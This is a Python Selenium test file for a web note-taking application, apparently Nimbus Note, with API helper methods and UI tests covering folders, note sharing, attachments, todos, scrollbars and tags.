    def _create_note_without_ui(self, title=None, text=None, parent_id=None, global_id=None):
        """Create or update a note directly through the notes:update API.

        Only the keyword arguments that are supplied (truthy) end up in the
        payload; returns the decoded server response."""
        note_data = {
            'type': 'note',
            'url': 'https://www.google.com.ua/'
        }
        if global_id:
            note_data["global_id"] = global_id
        if text:
            note_data["text"] = text
        if title:
            note_data["title"] = title
        if parent_id:
            note_data["parent_id"] = parent_id
        post_data = {
            'action': 'notes:update',
            'body': {
                'store': {
                    'notes': [note_data]
                }
            }
        }
        return self._do_request(data=post_data)
    def _create_folder_without_ui(self, name):
        """Create a folder named *name* through the notes:update API."""
        note_data = {
            'index': 0,
            'type': 'folder',
            'title': name
        }
        post_data = {
            'action': 'notes:update',
            'body': {
                'store': {
                    'notes': [note_data]
                }
            }
        }
        return self._do_request(data=post_data)
    def _get_notes_with_text(self, note_id):
        """Fetch a single note (including its text) by global id."""
        post_data = {
            'action': 'notes:get',
            'body': {
                'global_id': note_id
            }
        }
        return self._do_request(data=post_data)
    def _remove_item_without_ui(self, note_id):
        """Delete a note or folder by global id through the API."""
        post_data = {
            'action': 'notes:update',
            'body': {
                'remove': {
                    'notes': [note_id]
                }
            }
        }
        return self._do_request(data=post_data)
    def _context_click(self, element):
        """Open the context menu on *element*.

        NOTE(review): the right-click is performed twice with a pause —
        presumably a workaround for the menu not appearing on the first
        click; confirm whether one click suffices."""
        ActionChains(self.driver).context_click(element).perform()
        time.sleep(2)
        ActionChains(self.driver).context_click(element).perform()
    def _select_folder_by_name(self, name):
        # NOTE(review): duplicate definition — an identical method appears
        # earlier in this class; this later one silently overrides it.
        return self.driver.find_element_by_css_selector(".folder_short.ng-binding[title='" + name + "']")
    def _create_folder(self, name):
        """Create a folder through the UI and return its sidebar element."""
        name = name if name else "not_set"
        my_notes_menu_item = self.driver.find_element_by_css_selector("li#default")
        ActionChains(self.driver).move_to_element(my_notes_menu_item)
        time.sleep(4)
        my_notes_menu_item.click()
        time.sleep(4)
        add_folder_button = WebDriverWait(self.driver, 5).until(
            lambda x: x.find_element_by_css_selector("a.add_folder"))
        add_folder_button.click()
        text = self.driver.find_element_by_css_selector(".my_class")
        text.clear()
        text.send_keys(name)
        self.driver.find_element_by_id("create_folder").click()
        my_new_folder = self.driver.find_element_by_css_selector(".folder_short.ng-binding[title='" + name + "']")
        return my_new_folder
    def _create_new_note_in_current_folder(self):
        """Click the "new note" button in the currently opened folder."""
        time.sleep(2)
        button_create_note = self.driver.find_element_by_css_selector(".btn-wrapper button.btn.blue")
        button_create_note.click()
        time.sleep(2)
    def _set_text_to_current_note(self, text):
        """Type *text* into the note editor iframe of the open note."""
        editor_frame = self.driver.find_element_by_css_selector("#notes_text_ifr")
        self.driver.switch_to_frame(editor_frame)
        body = self.driver.find_element_by_css_selector("body")
        body.send_keys(text)
        # Switch back so subsequent lookups target the main document again.
        self.driver.switch_to_default_content()
    def _del_folder_without_ui(self, id):
        """Delete the folder with the given global id through the API."""
        notes_ids = [id]
        post_data = {
            'action': 'notes:update',
            'body': {
                'remove': {
                    'notes': notes_ids
                }
            }
        }
        return self._do_request(data=post_data)
    def _get_note_url_without_ui(self, id):
        """Toggle sharing for a note via the notes:share API and return the response."""
        post_data = {
            'action': 'notes:share',
            'body': {
                'toggle': {
                    'notes': [id]
                }
            }
        }
        return self._do_request(data=post_data)
    def _click_new_note(self):
        """Return (but do not click) the "new note" button element."""
        new_note = self.driver.find_element_by_css_selector(".btn-wrapper button")
        return new_note
    def _get_selectInFull(self):
        """Save the open note, reopen it in edit mode and return the first tag chip element."""
        save = self.driver.find_element_by_css_selector("#save_change_main")
        save.click()
        time.sleep(7)
        self.driver.refresh()
        time.sleep(10)
        f_note = self.driver.find_element_by_css_selector(".notes_list li:first-child")
        time.sleep(2)
        ActionChains(self.driver).click(f_note).perform()
        time.sleep(2)
        edit = self.driver.find_element_by_css_selector(".edit")
        edit.click()
        selectinfull = self.driver.find_element_by_css_selector(".tag_line .tag_line_search form .chzn-choices li:nth-child(1) span")
        return selectinfull
    def test_hidding_left_block_scroll(self):
        """Left sidebar pane and its scroll container must both be exactly 207px wide."""
        left_block = self.driver.find_element_by_css_selector('.jspPane')
        left_block_width = left_block.value_of_css_property('width')
        self.driver.set_script_timeout(15)
        horizont_scroll = self.driver.find_element_by_css_selector('.jspContainer')
        horizont_scroll_width = horizont_scroll.value_of_css_property('width')
        self.assertEqual(self._substract_px(left_block_width), 207, 'left block width is too big')
        self.assertEqual(self._substract_px(horizont_scroll_width), 207,
                         'horizont scroll width of left bloc is too big')
    def test_share_unshare_item(self):
        """Share the first note via the toolbar, then unshare it again."""
        my_notes_menu_item = self.driver.find_element_by_css_selector("li#default")
        my_notes_menu_item.click()
        self.driver.implicitly_wait(500)
        button_click_on_first_button = self.driver.find_element_by_css_selector(".notes_list li:first-child")
        button_click_on_first_button.click()
        self.driver.implicitly_wait(1500)
        share_unshare_button = self.driver.find_element_by_css_selector(".head_note a.share")
        self.assertIsNotNone(share_unshare_button)
        share_unshare_button.click()
        self.driver.implicitly_wait(1500)
        share_button = self.driver.find_element_by_css_selector(".title_password .remove_select")
        self.assertIsNotNone(share_button)
        share_button.click()
        self.driver.implicitly_wait(500)
        # Re-open the dialog and revert the note to its unshared state.
        share_unshare_button = self.driver.find_element_by_css_selector(".head_note a.share")
        self.assertIsNotNone(share_unshare_button)
        share_unshare_button.click()
        unshare_button = self.driver.find_element_by_css_selector(".unshare_note")
        self.assertIsNotNone(unshare_button)
        unshare_button.click()
        self.driver.refresh()
    def test_share_button_color(self):
        """After sharing, the share button must carry the .active state; unsharing removes it."""
        note_text = u"Some text"
        folder_name = self._get_random_name(16)
        folder_data = self._create_folder_without_ui(folder_name)["body"]["notes"][0]
        self.driver.refresh()
        time.sleep(2)
        folder = self._select_folder_by_name(folder_name)
        folder.click()
        time.sleep(2)
        # note_data is not used afterwards; the call exists for its side
        # effect of creating the note under the new folder.
        note_data = self._create_note_without_ui(
            title = u"test_note",
            text = note_text,
            global_id = self._get_random_name(16),
            parent_id=folder_data["global_id"]
        )["body"]["notes"][0]
        time.sleep(4)
        folder.click()
        self.driver.refresh()
        time.sleep(5)
        share_unshare_button = self.driver.find_element_by_css_selector(".head_note a.share")
        self.assertIsNotNone(share_unshare_button)
        share_unshare_button.click()
        time.sleep(5)
        share_button = self.driver.find_element_by_css_selector(".title_password .remove_select")
        self.assertIsNotNone(share_button)
        share_button.click()
        self.driver.implicitly_wait(500)
        # The ".active" modifier indicates the shared state visually.
        share_unshare_button = self.driver.find_element_by_css_selector(".head_note a.share.active")
        self.assertTrue(share_unshare_button.is_displayed())
        self.driver.implicitly_wait(500)
        share_unshare_button = self.driver.find_element_by_css_selector(".head_note a.share")
        self.assertIsNotNone(share_unshare_button)
        share_unshare_button.click()
        self.driver.implicitly_wait(1000)
        unshare_button = self.driver.find_element_by_css_selector(".unshare_note")
        self.assertIsNotNone(unshare_button)
        unshare_button.click()
        self.assertRaises(
            (exceptions.NoSuchElementException, WebDriverException),
            self.driver.find_element_by_css_selector,
            (".head_note a.share", )
        )
        self._del_folder_without_ui(folder_data["global_id"])
    def test_checking_padding_short_text_container(self):
        """First note item in the list must have padding-right greater than 19px."""
        my_notes_menu_item = self.driver.find_element_by_css_selector("li#default")
        ActionChains(self.driver).move_to_element(my_notes_menu_item)
        time.sleep(2)
        my_notes_menu_item.click()
        time.sleep(2)
        noteItemElement = self.driver.find_element_by_css_selector(".notes_list li:first-child")
        self.assertIsNotNone(noteItemElement)
        noteItemPaddingRight = noteItemElement.value_of_css_property('padding-right')
        # assertLess(a, b) asserts a < b, i.e. 19 < padding-right.
        self.assertLess(19, self._substract_px(noteItemPaddingRight), 'Option padding-right is too small');
    def test_focus_textarea_when_create_folder(self):
        """The folder-name textarea must receive focus when the create-folder dialog opens."""
        # folder_name is generated but never used in this test.
        folder_name = self._get_random_name(12)
        my_notes_menu_item = self.driver.find_element_by_css_selector("li#default")
        ActionChains(self.driver).move_to_element(my_notes_menu_item)
        time.sleep(2)
        my_notes_menu_item.click()
        time.sleep(2)
        add_folder_button = self.driver.find_element_by_css_selector("a.add_folder")
        time.sleep(2)
        add_folder_button.click()
        time.sleep(2)
        active_textarea = self.driver.find_element_by_css_selector('.my_class')
        active_element = self.driver.switch_to_active_element()
        self.assertEqual(active_element, active_textarea)
        cansel_button = self.driver.find_element_by_css_selector('.modal-footer button:last-child')
        cansel_button.click()
    def test_click_enter_in_create_folder_popup(self):
        """Pressing Enter in the create-folder dialog must create the folder."""
        folder_name = self._get_random_name(12)
        my_notes_menu_item = self.driver.find_element_by_css_selector("li#default")
        ActionChains(self.driver).move_to_element(my_notes_menu_item)
        time.sleep(2)
        my_notes_menu_item.click()
        time.sleep(2)
        add_folder_button = self.driver.find_element_by_css_selector("a.add_folder")
        time.sleep(2)
        add_folder_button.click()
        time.sleep(2)
        active_textarea = self.driver.find_element_by_css_selector('.my_class')
        time.sleep(2)
        # Select-all first so the typed name replaces any default text.
        ActionChains(self.driver).send_keys_to_element(active_textarea, Keys.CONTROL + "a").perform()
        time.sleep(2)
        active_textarea.send_keys(folder_name)
        time.sleep(5)
        ActionChains(self.driver).send_keys_to_element(active_textarea, Keys.ENTER).perform()
        time.sleep(4)
        my_new_folder = self.driver.find_element_by_css_selector(
            ".folder_short.ng-binding[title='" + folder_name + "']")
        time.sleep(2)
        self.assertIsNotNone(my_new_folder)
        # Clean up the folder we just created.
        id = self._get_folder_id_by_object(my_new_folder)
        self._del_folder_without_ui(id)
    def test_check_favicon(self):
        """Both favicon <link> variants must be present and enabled."""
        my_favicon_a = self.driver.find_element_by_css_selector("link[rel=icon]")
        my_favicon_b = self.driver.find_element_by_css_selector("link[rel='shortcut icon']")
        self.assertTrue(my_favicon_a.is_enabled())
        self.assertTrue(my_favicon_b.is_enabled())
    def test_check_nbsp_when_viewing(self):
        """An empty paragraph must render as a non-breaking space in view mode."""
        note_text = "<p> </p> <p>Some text</p>"
        folder_name = self._get_random_name(16)
        folder_data = self._create_folder_without_ui(folder_name)["body"]["notes"][0]
        self.driver.refresh()
        time.sleep(2)
        folder = self._select_folder_by_name(folder_name)
        folder.click()
        time.sleep(2)
        note_data = self._create_note_without_ui(
            title = u"test_note",
            text = note_text,
            global_id = self._get_random_name(16),
            parent_id=folder_data["global_id"]
        )["body"]["notes"][0]
        time.sleep(4)
        folder.click()
        self.driver.refresh()
        time.sleep(2)
        button_click_on_first_note = self.driver.find_element_by_css_selector(".notes_list li:first-child")
        button_click_on_first_note.click()
        time.sleep(4)
        empty = self.driver.find_element_by_css_selector("#scrollbarNotesText .jspPane:first-child p")
        not_empty = self.driver.find_element_by_css_selector("#scrollbarNotesText .jspPane p:nth-last-child(1)")
        self.assertEqual(empty.text, " ")
        self.assertNotEqual(not_empty.text, " ")
        # Clean up: delete the note through the UI, then the folder via API.
        delete_note_button = self.driver.find_element_by_css_selector(".action_buttons.head_note a.trash")
        delete_note_button.click()
        time.sleep(1)
        confirmation_button = self.driver.find_element_by_css_selector("button.btn.btn-warning")
        confirmation_button.click()
        self._remove_item_without_ui(folder_data["global_id"])
    def test_checking_quota_options(self):
        """The quota "get more" button must be hidden on the settings page."""
        user_button = self.driver.find_element_by_css_selector(".user_mail")
        ActionChains(self.driver).move_to_element(user_button)
        time.sleep(2)
        user_button.click()
        time.sleep(2)
        settings_button = self.driver.find_element_by_css_selector(".user_mail ul li:nth-child(2)")
        ActionChains(self.driver).move_to_element(settings_button)
        time.sleep(2)
        settings_button.click()
        time.sleep(2)
        # Located but not asserted on — they document the expected page state.
        quota_progresbar = self.driver.find_element_by_css_selector(".progress-striped.active.progress")
        quota_time_end = self.driver.find_element_by_css_selector(".settings div p.ng-binding")
        get_more_button = self.driver.find_element_by_css_selector('.progress_panel a')
        self.assertFalse(get_more_button.is_displayed())
        go_to_pro_link = self.driver.find_element_by_css_selector(
            ".settings div[ng-controller= 'UserController'] :nth-child(8)")
        ActionChains(self.driver).move_to_element(go_to_pro_link)
        time.sleep(2)
        go_to_pro_link.click()
        time.sleep(2)
        self.driver.get(self.url)
        self.driver.refresh()
    def test_delete_empty_folder_and_go_to_default_folder(self):
        """Deleting an empty folder must land the user back in "My Notes"."""
        my_notes_menu_item = self.driver.find_element_by_css_selector("li#default")
        ActionChains(self.driver).move_to_element(my_notes_menu_item)
        my_notes_menu_item.click()
        time.sleep(2)
        ActionChains(self.driver).move_to_element(self.driver.find_element_by_css_selector('.tree_nav'))
        add_folder_button = self.driver.find_element_by_css_selector("a.add_folder")
        add_folder_button.click()
        time.sleep(2)
        # Accept the default folder name suggested by the dialog.
        button_create_folder = self.driver.find_element_by_css_selector("button.btn.btn-warning")
        self.assertIsNotNone(button_create_folder)
        button_create_folder.click()
        time.sleep(2)
        my_new_folder = self.driver.find_element_by_css_selector(".folder_short.ng-binding[title='folder']")
        self.assertIsNotNone(my_new_folder)
        my_new_folder.click()
        time.sleep(2)
        self._context_click(my_new_folder)
        context_delete_button = self.driver.find_element_by_css_selector('.dropdown-menu li:last-child a')
        context_delete_button.click()
        button_delete_note = self.driver.find_element_by_css_selector("button.btn.btn-warning")
        self.assertIsNotNone(button_delete_note)
        button_delete_note.click()
        time.sleep(10)
        folder_name = self.driver.find_element_by_css_selector(".head.notes")
        folder_title = folder_name.get_attribute('title')
        self.assertEqual(folder_title, "My Notes")
def test_todo_add_not_remove_text(self):
    """Adding a todo item to a note must not wipe out the note's body text."""
    expected_text = u"test text"
    new_folder_name = self._get_random_name(16)
    created_folder = self._create_folder_without_ui(new_folder_name)["body"]["notes"][0]
    self.driver.refresh()
    time.sleep(2)
    folder_item = self._select_folder_by_name(new_folder_name)
    folder_item.click()
    time.sleep(2)
    self._create_note_without_ui(
        title=u"test_note",
        text=expected_text,
        global_id=self._get_random_name(16),
        parent_id=created_folder["global_id"],
    )["body"]["notes"][0]
    time.sleep(4)
    folder_item.click()
    self.driver.refresh()
    time.sleep(2)
    # Open the todo panel and add one item.
    self.driver.find_element_by_css_selector(".btn.grey.todo").click()
    time.sleep(1)
    self.driver.find_element_by_css_selector(".todo_text").send_keys("to_todo")
    time.sleep(2)
    self.driver.find_element_by_css_selector(".btn-primary").click()
    time.sleep(3)
    self.driver.refresh()
    time.sleep(2)
    # The original note text must still be there after the reload.
    saved_text = self.driver.find_element_by_css_selector("#all_text").text
    self.assertIsNotNone(saved_text)
    self.assertEqual(saved_text, expected_text)
    self._remove_item_without_ui(created_folder["global_id"])
    self._default_state()
def test_todo_add_not_remove_attach(self):
    """Adding a todo item must not drop the note's text or its attachment."""
    initial_text = "<p>some text</p>"
    new_folder_name = self._get_random_name(16)
    created_folder = self._create_folder_without_ui(new_folder_name)["body"]["notes"][0]
    self.driver.refresh()
    time.sleep(4)
    folder_item = self._select_folder_by_name(new_folder_name)
    folder_item.click()
    time.sleep(2)
    created_note = self._create_note_without_ui(
        title=u"test_note",
        text=initial_text,
        parent_id=created_folder["global_id"],
    )["body"]["notes"][0]
    time.sleep(4)
    folder_item.click()
    note_id = created_note["global_id"]
    # Upload an attachment, then update the note text over the API.
    fixture_file = self.check_fixture_file('114-1024.JPG')
    self._do_attachment_upload(fixture_file=fixture_file, note_id=note_id)
    text_with_attach = '<p> some text </p>'
    self._create_note_without_ui(
        text=text_with_attach,
        global_id=created_note["global_id"],
    )["body"]["notes"]
    time.sleep(4)
    self.driver.find_element_by_id(note_id).click()
    time.sleep(8)
    # Add a todo item through the UI.
    self.driver.find_element_by_css_selector(".btn.grey.todo").click()
    time.sleep(2)
    self.driver.find_element_by_css_selector(".todo_text").send_keys(u"to_todo")
    self.driver.find_element_by_css_selector(".btn-primary").click()
    time.sleep(2)
    self.driver.refresh()
    time.sleep(4)
    # The note text (including the attachment markup) must be unchanged.
    refreshed_note = self._get_notes_with_text(note_id)["body"]["notes"][0]
    self.assertEqual(refreshed_note["text"], text_with_attach)
    self._remove_item_without_ui(created_folder["global_id"])
def test_open_close_attach_menu_in_main(self):
    """Toggle the attachments panel in the main view; the first row must
    show the expected attachment name and size, and a second click must
    hide the panel again."""
    attach_fname = '114-1024.JPG'
    data = self._create_folder_and_note_with_image_attach(in_list=True, attach_name=attach_fname)
    toggle_button = self.driver.find_element_by_css_selector('.btn.grey.attache.edit_mode.main_view')
    toggle_button.click()
    first_row = self.driver.find_element_by_css_selector('.notes_content .attaches_list li:first-child .attachments_names')
    panel = self.driver.find_element_by_css_selector('.notes_content .attaches_menu')
    self.assertTrue(first_row.is_displayed())
    self.assertTrue(panel.is_displayed())
    self.assertEqual(first_row.text.upper(), attach_fname + " 233.431 KB")
    toggle_button.click()
    self.assertFalse(panel.is_displayed())
    self._remove_item_without_ui(data[0]["global_id"])
def test_open_close_images_menu(self):
    """The editor's images drop-down must open from its toolbar button,
    close on a second click, and close from its own close control."""
    note_body = u"test text"
    new_folder_name = self._get_random_name(16)
    created_folder = self._create_folder_without_ui(new_folder_name)["body"]["notes"][0]
    self.driver.refresh()
    time.sleep(4)
    folder_item = self._select_folder_by_name(new_folder_name)
    folder_item.click()
    time.sleep(2)
    created_note = self._create_note_without_ui(
        title=u"test_note",
        text=note_body,
        parent_id=created_folder["global_id"],
    )["body"]["notes"][0]
    time.sleep(4)
    folder_item.click()
    note_id = created_note["global_id"]
    # Attach an image and update the note text so the menu has content.
    fixture_file = self.check_fixture_file('attach-1.jpg')
    self._do_attachment_upload(fixture_file=fixture_file, note_id=note_id)
    self._create_note_without_ui(
        text='<p>some text</p>',
        global_id=created_note["global_id"],
    )["body"]["notes"]
    time.sleep(4)
    self.driver.find_element_by_id(note_id).click()
    self.driver.find_element_by_css_selector('.head_note .edit').click()
    self.driver.maximize_window()
    menu_button = self.driver.find_element_by_css_selector('#mce_17 button')
    menu_button.click()
    images_menu = self.driver.find_element_by_css_selector('#imagesList')
    self.assertTrue(images_menu.is_displayed())
    # Second click on the toolbar button toggles the menu shut.
    menu_button.click()
    self.assertFalse(images_menu.is_displayed())
    # Reopen, then close via the menu's own close control.
    menu_button.click()
    self.driver.find_element_by_css_selector('#imagesList .remove_select').click()
    self.assertFalse(images_menu.is_displayed())
    self._remove_item_without_ui(created_folder["global_id"])
def test_download_attach(self):
    """An uploaded attachment must be exposed as a download link that
    opens in a new tab and points at the uploaded file."""
    data = self._create_folder_and_note_with_image_attach(in_list=True, attach_name='attach-1.jpg')
    open_attach_button = self.driver.find_element_by_css_selector('.btn.grey.attache.edit_mode.main_view')
    open_attach_button.click()
    attach = self.driver.find_element_by_css_selector('.attachments_names a')
    self.assertEqual('_blank', attach.get_attribute('target'))
    # Fixed: the 'download' attribute was asserted twice verbatim; one
    # check is sufficient.
    self.assertEqual('attach-1.jpg', attach.get_attribute('download'))
    self.assertIn('attach-1.jpg', attach.get_attribute('href'))
    self._remove_item_without_ui(data[1]["global_id"])
def test_refresh_noteslist_when_add_todo(self):
    """After adding a todo to a note, the notes list must refresh and
    move that note to the first position."""
    note_text = u"test text"
    folder_name = self._get_random_name(16)
    folder_data = self._create_folder_without_ui(folder_name)["body"]["notes"][0]
    self.driver.refresh()
    # Bug fix: implicitly_wait() takes SECONDS, not milliseconds -- the
    # original values (4000, 2000, ...) configured multi-hour timeouts.
    self.driver.implicitly_wait(4)
    folder = self._select_folder_by_name(folder_name)
    folder.click()
    self.driver.implicitly_wait(2)
    note1_data = self._create_note_without_ui(
        title=u"test_note",
        text=note_text,
        parent_id=folder_data["global_id"],
    )["body"]["notes"][0]
    # A second note pushes the first one down the list.
    self._create_note_without_ui(
        title=u"test_note",
        text=note_text,
        parent_id=folder_data["global_id"],
    )["body"]["notes"][0]
    self.driver.implicitly_wait(2)
    folder.click()
    self.driver.implicitly_wait(6)
    target_note = self.driver.find_element_by_id(note1_data["global_id"])
    target_note.click()
    self.driver.implicitly_wait(2)
    todo_open_menu = self.driver.find_element_by_css_selector('.notes_content .todo')
    todo_open_menu.click()
    self.driver.implicitly_wait(1)
    input_todo = self.driver.find_element_by_css_selector('.todo_text')
    input_todo.send_keys("todo_example")
    add_todo = self.driver.find_element_by_css_selector('.notes_content .btn-primary')
    add_todo.click()
    time.sleep(2)
    # Adding the todo should bump the older note back to the top.
    expected_first_note = self.driver.find_element_by_css_selector('.first')
    self.assertEqual(expected_first_note.get_attribute('id'), note1_data["global_id"])
    self._remove_item_without_ui(folder_data["global_id"])
def test_scrolls_in_share(self):
    """Open a shared note containing an oversized element; the shared
    page must load and the client must navigate back cleanly."""
    new_folder_name = self._get_random_name(12)
    create_result = self._create_folder_without_ui(new_folder_name)
    time.sleep(3)
    self.driver.refresh()
    self.assertIsNotNone(create_result)
    folder = create_result["body"]["notes"][0]
    self.assertIsNotNone(folder)
    folder_element = self._select_folder_by_name(folder['title'])
    folder_element.click()
    time.sleep(2)
    oversized_html = '<div><div style="width:5000px; height:10000px; border:1px solid;">loreup ipsum</div></div>'
    note = self._create_note_without_ui(text=oversized_html, parent_id=folder["global_id"], title='1234')["body"]["notes"][0]
    share_path = self._get_note_url_without_ui(note["global_id"])["body"]["notes_shared"][0][note["global_id"]]
    self.driver.get(self.url.replace("/client/", "") + share_path)
    self.driver.get(self.url)
def test_tools_menu(self):
    """Opening the tools selectbox must show its menu items and keep the
    secondary list enabled."""
    self.driver.find_element_by_css_selector('#toolsButton .jq-selectbox__select-text').click()
    time.sleep(2)
    item_two = self.driver.find_element_by_css_selector(".jq-selectbox__dropdown.tools_menu ul:first-child li:nth-child(2)")
    item_five = self.driver.find_element_by_css_selector(".jq-selectbox__dropdown.tools_menu ul:first-child li:nth-child(5)")
    self.assertTrue(item_two.is_displayed())
    self.assertTrue(item_five.is_displayed())
    secondary_list = self.driver.find_element_by_css_selector(".jq-selectbox__dropdown.tools_menu ul:nth-child(2)")
    self.assertTrue(secondary_list.is_enabled())
def test_short_url(self):
    """The short-url control must open a modal containing a non-empty
    short link value."""
    self._get_shared_link()
    self.driver.find_element_by_css_selector(".short_url").click()
    time.sleep(5)
    modal_header = self.driver.find_element_by_css_selector(".modal-header h3").text
    self.assertEqual(modal_header, "Short Link:")
    short_link = self.driver.find_element_by_css_selector(".modal-body.ng-binding input").get_attribute("value")
    # Angular renders "undefined" when the binding failed -- reject both
    # that and an empty value.
    self.assertNotEqual(short_link, "")
    self.assertNotEqual(short_link, "undefined")
    self._default_state()
def test_for_save_to_my_nimbus(self):
    """"Save to my Nimbus" on a shared note must open the copying modal
    and keep the attachment on the copied note."""
    attach_name = self._get_shared_link()
    time.sleep(3)
    self.driver.find_element_by_css_selector(".btn.blue.save_to_my").click()
    time.sleep(5)
    modal_header = self.driver.find_element_by_css_selector(".modal-header h3").text
    self.assertEqual(modal_header, "Copying:")
    modal_body = self.driver.find_element_by_css_selector(".modal-body.ng-binding").text
    self.assertNotEqual(modal_body, "")
    self.assertNotEqual(modal_body, "undefined")
    self._default_state()
    # Back in the client: the copied note must carry the attachment.
    toggle_button = self.driver.find_element_by_css_selector('.btn.grey.attache.edit_mode.main_view')
    toggle_button.click()
    attach_count = self.driver.find_element_by_css_selector('.btn.grey.attache.edit_mode.main_view span').text
    self.assertEqual(attach_count, "1")
    saved_attach = self.driver.find_element_by_css_selector('.head_notes .attaches_list li:first-child a')
    self.assertIn(attach_name, saved_attach.get_attribute('download').upper())
def test_scroll_when_view_note(self):
    """A note with oversized content must show both the vertical and the
    horizontal scrollbar in the note viewer."""
    new_folder_name = self._get_random_name(12)
    create_result = self._create_folder_without_ui(new_folder_name)
    time.sleep(3)
    self.assertIsNotNone(create_result)
    folder = create_result["body"]["notes"][0]
    self.assertIsNotNone(folder)
    time.sleep(2)
    oversized_html = '<div><div style="width:5000px; height:10000px; border:1px solid;">loreup ipsum</div></div>'
    note = self._create_note_without_ui(title='qwerty', text=oversized_html, parent_id=folder["global_id"])["body"]["notes"][0]
    self.driver.refresh()
    folder_element = self._select_folder_by_name(folder['title'])
    folder_element.click()
    time.sleep(5)
    self.driver.find_element_by_id(note["global_id"]).click()
    time.sleep(5)
    vertical_bar = self.driver.find_element_by_css_selector("#scrollbarNotesText .jspVerticalBar")
    horizontal_bar = self.driver.find_element_by_css_selector("#scrollbarNotesText .jspHorizontalBar")
    self.assertTrue(vertical_bar.is_displayed())
    self.assertTrue(horizontal_bar.is_displayed())
    time.sleep(5)
    self._del_folder_without_ui(folder["global_id"])
def test_show_or_hide_top_menu_in_editor(self):
    """The editor's top-panel toggle must hide both header rows, and a
    second click must show them again."""
    self._create_folder_without_ui("editorTopMenu")
    self.driver.refresh()
    time.sleep(10)
    folder_item = self._select_folder_by_name("editorTopMenu")
    folder_item.click()
    time.sleep(5)
    self.driver.find_element_by_css_selector(".btn-wrapper button").click()
    time.sleep(5)
    # First toggle: hide the top panel.
    self.driver.find_element_by_css_selector(".show_panel_button").click()
    time.sleep(5)
    header_row = self.driver.find_element_by_css_selector(".sub_header.edit_note.edit_mode")
    tag_row = self.driver.find_element_by_css_selector(".main.edit_mode #scrollbarY4.custom_scroll.edit_note .tag_line:first-child")
    self.assertFalse(header_row.is_displayed())
    self.assertFalse(tag_row.is_displayed())
    time.sleep(5)
    # Second toggle: show it again.
    self.driver.find_element_by_css_selector(".show_panel_button").click()
    time.sleep(5)
    header_row = self.driver.find_element_by_css_selector(".sub_header.edit_note.edit_mode")
    tag_row = self.driver.find_element_by_css_selector(".main.edit_mode #scrollbarY4.custom_scroll.edit_note .tag_line:first-child")
    self.assertTrue(header_row.is_displayed())
    self.assertTrue(tag_row.is_displayed())
# TODO: fix (original reviewer note "правити", Ukrainian for "to fix")
def test_count_attaches(self):
    """The attachment counter badge must track uploads and deletions."""
    # Fixed: attach_fname was assigned but the literal was duplicated in
    # the call below; use the variable as the single source of truth.
    attach_fname = '114-1024.JPG'
    data = self._create_folder_and_note_with_image_attach(in_list=True, attach_name=attach_fname)
    open_close_attach_button = self.driver.find_element_by_css_selector('.btn.grey.attache.edit_mode.main_view')
    count_attaches = self.driver.find_element_by_css_selector('.btn.grey.attache.edit_mode.main_view span').text
    self.assertEqual(count_attaches, "1")
    open_close_attach_button.click()
    delete_attach_button = self.driver.find_element_by_css_selector('.notes_content .attaches_list li:first-child .delete_attach_btn')
    delete_attach_button.click()
    time.sleep(2)
    count_attaches = self.driver.find_element_by_css_selector('.btn.grey.attache.edit_mode.main_view span').text
    self.assertEqual(count_attaches, "0")
    self._remove_item_without_ui(data[0]["global_id"])
def test_close_attach_menu_from_itself(self):
    """The attachments panel must close via its own close control."""
    note_body = "<p>some text</p>"
    new_folder_name = self._get_random_name(16)
    created_folder = self._create_folder_without_ui(new_folder_name)["body"]["notes"][0]
    self.driver.refresh()
    time.sleep(4)
    folder_item = self._select_folder_by_name(new_folder_name)
    folder_item.click()
    time.sleep(2)
    created_note = self._create_note_without_ui(
        title=u"test_note",
        text=note_body,
        parent_id=created_folder["global_id"],
    )["body"]["notes"][0]
    time.sleep(4)
    folder_item.click()
    # Dismiss the overlay if one is showing.
    if self.driver.find_element_by_css_selector('.notes div').is_displayed():
        self.driver.find_element_by_css_selector('.notes span').click()
    note_id = created_note["global_id"]
    fixture_file = self.check_fixture_file('114-1024.JPG')
    self._do_attachment_upload(fixture_file=fixture_file, note_id=note_id)
    self._create_note_without_ui(
        text='<p>some text</p>',
        global_id=created_note["global_id"],
    )["body"]["notes"]
    time.sleep(4)
    self.driver.find_element_by_id(note_id).click()
    time.sleep(3)
    self.driver.find_element_by_css_selector('.btn.grey.attache.edit_mode.main_view').click()
    attaches_menu = self.driver.find_element_by_css_selector('.notes_content .attaches_menu')
    self.assertTrue(attaches_menu.is_displayed())
    self.driver.maximize_window()
    # Close the panel from its own close control, not the toggle button.
    self.driver.find_element_by_css_selector('.notes_content .remove_select').click()
    self.assertFalse(attaches_menu.is_displayed())
    self._remove_item_without_ui(created_folder["global_id"])
def test_click_to_open_products_menu(self):
    """The products menu on a shared page must open with its first item
    rendered at the expected height."""
    data = self._create_folder_and_note_with_image_attach(in_list=True)
    share_path = self._get_note_url_without_ui(data[0]["global_id"])["body"]["notes_shared"][0][data[0]["global_id"]]
    self.driver.get(self.url.replace("/client/", "") + share_path)
    time.sleep(2)
    self.driver.find_element_by_css_selector(".user_services__select").click()
    time.sleep(1)
    first_item_size = self.driver.find_element_by_css_selector(".products_menu li:first-child a").size
    expected_height = 55
    self.assertEqual(first_item_size['height'], expected_height)
    self._remove_item_without_ui(data[1]["global_id"])
    self._default_state()
def test_refresh_note_tags_list(self):
    """A tag added in the editor must still be selected and visible
    after the note is saved."""
    note_text = "<p>some text</p>"
    folder_name = self._get_random_name(16)
    folder_data = self._create_folder_without_ui(folder_name)["body"]["notes"][0]
    self.driver.refresh()
    time.sleep(4)
    folder = self._select_folder_by_name(folder_name)
    folder.click()
    time.sleep(2)
    self._create_note_without_ui(
        title=u"test_note",
        text=note_text,
        parent_id=folder_data["global_id"],
    )["body"]["notes"][0]
    time.sleep(4)
    folder.click()
    self.driver.refresh()
    time.sleep(2)
    edit_button = self.driver.find_element_by_css_selector('.head_note .edit')
    edit_button.click()
    select = self.driver.find_element_by_css_selector('.tag_line_search ul .search-field input')
    select.click()
    time.sleep(1)
    tag_name = self._get_random_name(4)
    select.send_keys(tag_name)
    add_tag_button = self.driver.find_element_by_css_selector('li.no-results a')
    add_tag_button.click()
    my_selected_tag = self.driver.find_element_by_css_selector(".tag_line_search ul.chzn-choices li.search-choice:first-child")
    # Fixed: assertEqual instead of assertTrue(a == b) so a failure
    # reports both values, not just "False is not true".
    self.assertEqual(my_selected_tag.text, tag_name)
    self.assertTrue(my_selected_tag.is_displayed())
    save_note_button = self.driver.find_element_by_css_selector('button.save_change')
    save_note_button.click()
    time.sleep(6)
    # After saving, the tag must still be selected.
